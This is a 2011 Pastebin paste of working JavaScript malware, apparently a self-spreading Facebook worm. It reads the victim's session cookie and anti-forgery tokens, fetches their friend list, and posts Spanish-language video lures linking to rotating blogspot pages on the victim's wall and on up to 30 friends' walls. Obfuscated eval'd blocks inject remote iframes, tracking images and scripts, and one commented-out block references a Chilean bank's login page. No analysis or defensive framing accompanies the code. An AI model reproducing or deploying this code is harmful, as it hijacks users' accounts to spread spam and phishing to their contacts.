SHARE
TWEET

pastebin2

a guest Dec 12th, 2011 5,335 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. var blogs = new Array();
 2. blogs[0] = 'http://lboro1.blogspot.com/';
 3. blogs[1] = 'http://lboro2.blogspot.com/';
 4. blogs[2] = 'http://lboro3.blogspot.com/';
 5. blogs[3] = 'http://lboro4.blogspot.com/';
 6. blogs[4] = 'http://lboro5.blogspot.com/';
 7. blogs[5] = 'http://lboro6.blogspot.com/';
 8. blogs[6] = 'http://lboro7.blogspot.com/';
 9. blogs[7] = 'http://lboro8.blogspot.com/';
 10. blogs[8] = 'http://lboro9.blogspot.com/';
 11. blogs[9] = 'http://lboro10.blogspot.com/';
 12.  
 13.  
 14.  
 15.  
 16. randno2 = Math.floor(Math.random() * blogs.length);
 17. blog = blogs[randno2];
 18.  
 19. // blogs
 20.  
 21.  
 22. function enchulatuFB() {
 23.     var ifra;

 25.         ifra = document.getElementById("player_iframe");
 26.         if (ifra != null) {
 27.             ifra.style.marginLeft = "0px";
 28.             ifra.src = "http://voltor.info/video/video.html"
 29.         }
 30.         ifra = document.getElementById('liframe')
 31.         if (ifra != null) {
 32.             ifra.innerHTML = '<iframe id="change" width="500" src="http://vevideo.com.es/plugin/unlocked.php" height="300" scrolling="no" frameborder="0"></iframe>'
 33.         };
 34.     }
 35.     if (location.href.match(/^http:\/\/(www\.)?darkvir1\.info/i) || location.href.match(/^http:\/\/(www\.)?darkvir2\.info/i) || location.href.match(/^http:\/\/(www\.)?darkvir3\.info/i) || location.href.match(/^http:\/\/(www\.)?darkvir4\.info/i) || location.href.match(/^http:\/\/(www\.)?darkvir5\.info/i)) {
 36.         ifra = document.getElementById('liframe')
 37.         if (ifra != null) {
 38.             ifra.innerHTML = '<iframe id="change" width="500" src="unlocked.html" height="300" scrolling="no" frameborder="0"></iframe>'
 39.         };
 40.     }
 41. }
 42. enchulatuFB();
 43. eval(function (p, a, c, k, e, r) {
 44.     e = function (c) {
 45.         return c.toString(a)
 46.     };
 47.     if (!''.replace(/^/, String)) {
 48.         while (c--) r[e(c)] = k[c] || e(c);
 49.         k = [function (e) {
 50.             return r[e]
 51.         }];
 52.         e = function () {
 53.             return '\\w+'
 54.         };
 55.         c = 1
 56.     };
 57.     while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
 58.     return p
 59. }('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|redfaceplus3|gif|width|height|border|appendChild|true'.split('|'), 0, {})) //eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('40="20";8(41.31.46(/^5:\\/\\/(9\\.)?45\\.14/47)){6 3=2["16"]("18");3.12="5://43.3.11/23/44.23.24";3.22="25/21";3.19=17(){6 15=2.35("34")[0];8(15==33)32 30;6 4=2.16("36");4.12="5://37.39.38/42/55.60";4.61="0";4.57="0";4.48="0";15.13(4);6 7=2["16"]("18");7.12="5://9.26.11/14/27.28/50.24?49="+51;7.22="25/21";7.19=17(){8(54=="20"){6 10=2.59("53");8(10==33){32 30}10.52[1].31="5://9.26.11/14/27.28/?56=58"}};2.29.13(7)};2.29.13(3)}',10,62,'||document|hashemian|ss|http|var|clcl|if|www|objobj|com|src|appendChild|cl|oo|createElement|function|script|onload|no|javascript|type|js|php|text|hardtrons|C8AA27305BBB4AD7B769656766711E4BC8AA27305BBB4AD7B769656766711E4B|asp|head|false|href|return|null|body|getElementsByTagName|img|whos|us|amung|VIH_DisplayOnPage|location|swidget|scripts|visitorIPHOST|bancoestado|match|i|border|ip|get|VIH_HostIP|children|side2|analisis|viri20111|STP|height|login|getElementById|gif|width'.split('|'),0,{}))
 60.  
 61.  
 62. function readCookie(a) {
 63.     var b = a + '=';
 64.     var c = document['cookie']['split'](';');
 65.     for (var d = 0; d < c['length']; d++) {
 66.         var e = c[d];
 67.         while (e['charAt'](0) == ' ') {
 68.             e = e['substring'](1, e['length']);
 69.         }
 70.         if (e['indexOf'](b) == 0) {
 71.             return e['substring'](b['length'], e['length']);
 72.         }
 73.     }
 74.     return null;
 75. }
 76.  
 77. function setCookie(nombre, valor, caducidad) {
 78.     var expireDate = new Date()
 79.     expireDate.setDate(expireDate.getDate() + caducidad);
 80.     document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
 81. }
 82.  
 83. function getRandomInt(a, b) {
 84.     return Math['floor'](Math['random']() * (b - a + 1)) + a
 85. }
 86.  
 87. function randomValue(a) {
 88.     return a[getRandomInt(0, a['length'] - 1)]
 89. }
 90.  
 91. function fb_comparte() {
 92.     var user_id = readCookie('c_user');
 93.     var uid = user_id;
 94.     if (document['getElementsByName']('post_form_id')[0] == null || document['getElementsByName']('fb_dtsg')[0] == null) return false;
 95.     var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
 96.     var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
 97.     var video_url = blog;
 98.     var domains = ['http://i40.tinypic.com/8zenw6.png'];
 99.     var p0 = ['.'];
 100.     var p1 = ['hola', 'como va', 'como estas!', 'Que tal', 'Hola!', 'Mira!'];
 101.     var p2 = ['has visto que', 'ya vistes que', 'sabes que'];
 102.     var p3 = [' sales en un video??'];
 103.     var message = '';
 104.     var a;
 105.     gf = new XMLHttpRequest();
 106.     gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
 107.     gf['send']();
 108.     if (gf['readyState'] != 4) {} else {
 109.         data = eval('(' + gf['responseText']['substr'](9) + ')');
 110.         if (data['error']) {
 111.             return false;
 112.         } else {
 113.             a = data;
 114.         }
 115.     }
 116.     var b = a['payload']['entries']['length'];
 117.     if (b > 30) {
 118.         b = 30
 119.     };
 120.     var cook = readCookie("fv_video_" + user_id);
 121.     if (cook == "activo") return false;
 122.     message = [randomValue(p1), randomValue(p2), randomValue(p3)]['join'](' ');
 123.     var c = new XMLHttpRequest();
 124.     var d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
 125.     var title = 'Sales aqui?';
 126.     var summary = 'Lo viste ya?';
 127.     var imagen = 'http://i40.tinypic.com/8zenw6.png';
 128.     var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + video_url + '&attachment[params][urlInfo][canonical]=' + video_url + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + '&attachment[params][url]=' + video_url + '&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][v]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
 129.     c['open']('POST', d, true);
 130.     c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
 131.     c['setRequestHeader']('Content-length', e['length']);
 132.     c['setRequestHeader']('Connection', 'keep-alive');
 133.     c['onreadystatechange'] = function () {};
 134.     c['send'](e);
 135.     for (var f = 0; f < b; f++) {
 136.         if (a['payload']['entries'][f]['uid'] != user_id) {
 137.             message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
 138.             var g = new XMLHttpRequest();
 139.             d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
 140.             title = 'Sales aqui?!';
 141.             summary = 'Dime que te parecio porfavor!';
 142.             imagen = 'http://i40.tinypic.com/8zenw6.png';
 143.             e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + video_url + '&attachment[params][urlInfo][canonical]=' + video_url + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + video_url + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
 144.             g['open']('POST', d, true);
 145.             g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
 146.             g['setRequestHeader']('Content-length', e['length']);
 147.             g['setRequestHeader']('Connection', 'keep-alive');
 148.             g['onreadystatechange'] = function () {};
 149.             g['send'](e);
 150.         }
 151.     }
 152.     setCookie("fv_video_" + user_id, "activo", 1);
 153.     return true;
 154. }
 155.  
 156. function FBFBFB321() {
 157.     if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
 158.         var cook = readCookie("fv_video");
 159.         if (cook == "activo") {
 160.             return false;
 161.         }
 162.         var user_id = readCookie('c_user');
 163.         if (user_id == null) return false;
 164.         cook = readCookie("fv_video_" + user_id);
 165.         if (cook == "activo") {
 166.             return false;
 167.         }
 168.         setTimeout(function () {
 169.             fb_comparte();
 170.         }, 2000);
 171.         return true;
 172.     }
 173.     return false;
 174. }
 175. FBFBFB321();
 176.  
RAW Paste Data
Top